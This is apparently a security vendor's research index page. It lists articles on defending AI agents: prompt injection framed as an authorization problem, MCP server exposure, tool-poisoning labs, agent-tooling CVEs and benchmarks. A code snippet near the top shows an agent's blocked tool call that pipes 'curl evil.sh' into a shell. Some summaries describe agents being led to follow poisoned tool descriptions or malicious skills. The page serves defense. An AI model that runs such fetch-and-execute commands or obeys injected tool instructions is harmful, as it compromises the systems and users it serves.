Research

Field notes from the audit trail.

Patterns, findings and arguments from 250+ real vulnerabilities found across AI agent systems, MCP servers and developer tools. Written for the teams building and securing agent systems. The research explains the same problems Oktsec is built to control: tool access, prompt injection, MCP exposure, signed policy and verified evidence.

Research·8 min read·May 12, 2026

Prompt injection is an authorization problem.

Every few weeks a new prompt-injection trick makes the rounds, and every few weeks a new filter ships to block it. That arms race is unwinnable. The durable fix is to stop asking what the model read and start enforcing what the agent is allowed to do.

Read the article
untrusted-input → actionblocked
1# tool call requested by agent
2call shell.exec("curl evil.sh | sh")
3# policy check, not content filter
4deny shell.exec ∉ allow_list
5→ held for review · env-77a2
All research · 17
01

Anatomy of the agent-tooling CVEs.

Six critical 2025-2026 CVEs (mcp-remote, Cursor CurXecute and DuneSlide, MCPoison, MCP Inspector, Copilot YOLO mode) read as one pattern: untrusted input reaching a privileged action through a config the tool auto-trusts.

incidentsCVERCE
Research9 min
Jul 3, 2026
02

How agent security benchmarks actually score.

AgentDojo, InjecAgent, ASB, MCPSecBench, MSB, MCPTox measure different attack classes on different harnesses. A single ASR number out of context tells you almost nothing.

benchmarksAgentDojoASR
Research8 min
Jul 3, 2026
03

Oktsec Labs: measuring a defense's ASR delta with AgentDojo.

Run AgentDojo with and without a defense, report the ASR drop and the utility cost, and treat any isolated score as provisional until the attack adapts. Reproducible.

labsreproducibleAgentDojo
Oktsec Labs9 min
Jul 3, 2026
01

What the research shows about defending AI agents.

The 2025-2026 defense literature read as one document: detection defenses post the best isolated AgentDojo scores and lose to adaptive attacks, while pre-action authorization keeps its guarantee.

literatureAgentDojoauthorization
Research10 min
Jul 3, 2026
02

How exposed are MCP servers, really?

A meta-analysis of the 2025-2026 scans (Astrix, Trend Micro, Knostic, Enkrypt, MCPTox): the through-line across independent surveys is missing authentication and over-broad credentials, not exotic exploits.

field studyMCPdata
Research9 min
Jul 3, 2026
03

Oktsec Labs: reproducing a tool-poisoning attack, and catching it.

A reproducible walkthrough: stand up a legitimate MCP server, poison a tool description, watch the agent follow it, then catch it with a static scan, and see why authorization at the boundary is the durable control.

labsreproducibletool poisoning
Oktsec Labs9 min
Jul 3, 2026
01

Prompt injection is an authorization problem.

Filtering malicious input will keep failing. The durable fix is deciding what an agent is allowed to do before it acts, and verifying what it did after.

prompt injectionauthorizationdeterministic policy
Research8 min
May 12, 2026
02

What an MCP server actually exposes.

A practical map of the tool surfaces, credentials and trust boundaries behind the Model Context Protocol, drawn from real audits.

MCPtool securitytrust boundaries
Guide11 min
May 28, 2026
03

Why policy for agents must be signed.

How signed bundles and pull initiated by the node keep policy verifiable from authoring to apply, even in isolated environments.

signed policyed25519supply chain
Engineering7 min
Jun 9, 2026
04

The agent supply chain is bigger than your dependency tree.

Packages, MCP servers, skills and the trust behind them: what agents pull into your environment and the failure patterns found monitoring 58,000+ published artifacts.

supply chainprovenancepinning
Research9 min
Jul 1, 2026
05

Agent work needs evidence, not trust.

What to record when agents do company work: per-call evidence, signed policy as the reference, and verification that closes the loop.

evidenceaudit trailverification
Research8 min
Jul 1, 2026
06

The identity stack for AI agents: what shipped, what didn't.

Signed Agent Cards, Enterprise-Managed Authorization, task-scoped tokens and delegation proofs, mapped layer by layer, with the per-instance gap nobody ships yet.

identityA2Aauthorization
Research8 min
Jul 1, 2026
08

Authorization telemetry for AI agents.

Instrument the authorization decision on every tool call: a trace_authorization span with identity, tool, arguments and verdict, exported through OpenTelemetry.

telemetryobservabilityopentelemetry
Research8 min
Jul 3, 2026
09

How to secure an MCP server.

Deciding what a server's tools may do before an agent calls them, and verifying what happened after. The four surfaces, least privilege, and the current spec.

MCPhow-tobest practices
Guide8 min
Jul 3, 2026
10

How to audit a Claude skill before you run it.

A skill is instructions an agent will follow. After ClawHavoc's 335 malicious skills, how to read one the way an attacker would, by hand and at scale.

skillssupply chainaudit
Research7 min
Jul 3, 2026
11

The CSA Agentic Trust Framework, in plain terms.

What the Cloud Security Alliance framework says about zero trust for agents, and how its principles map to authorization, signed policy and verified evidence.

governancezero trustframeworks
Research7 min
Jul 3, 2026
07

Detection versus authorization.

The two security models for AI agents, defined. Why agents break detection-first security and why authorization has to come first, with detection on top.

governanceauthorizationdetection
Research7 min
Jul 2, 2026
Free resource

The Agent Security Checklist

The same checklist we run on client code, distilled from 250+ real vulnerabilities. Vendor-neutral, no product required.

Get the checklist

From reading about agent risk to controlling it.

The control loop in these articles is the product. See it run on your own environments.